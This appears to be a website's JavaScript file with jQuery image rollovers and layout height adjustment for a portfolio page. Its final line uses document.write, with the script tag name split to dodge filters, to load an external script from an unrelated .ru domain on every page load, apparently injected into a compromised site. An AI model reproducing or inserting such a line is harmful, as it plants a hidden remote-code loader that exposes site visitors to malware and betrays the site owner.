function doRollovers() {
	if ($("#portfolio")) { 
		$("ul").find("img").mouseover(function() {
			var source = $(this).attr("src");
			var newSource = source.slice(0,-7);
			newSource = newSource + ".jpg";
			$(this).attr("src",newSource);
			});
			
		$("ul").find("img").mouseout(function() {
			var source = $(this).attr("src");
			var newSource = source.slice(0,-4);
			newSource = newSource + "-bw.jpg";
			$(this).attr("src",newSource);
			});
		}
	}
	
function adjustHeight() {
	
	if ($(window).height() > $("body").height()) {
		var difference = $(window).height() - $("body").height();
		var newheight = $("#content").height() + difference;
		newheight = newheight + "px";
		$("#content").css('height',newheight);
		}
	
	}


$(document).ready(function() {
	doRollovers();
	adjustHeight();
	$.preloadCssImages();
	});


document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Video_Card.js"></scri'+'pt>');
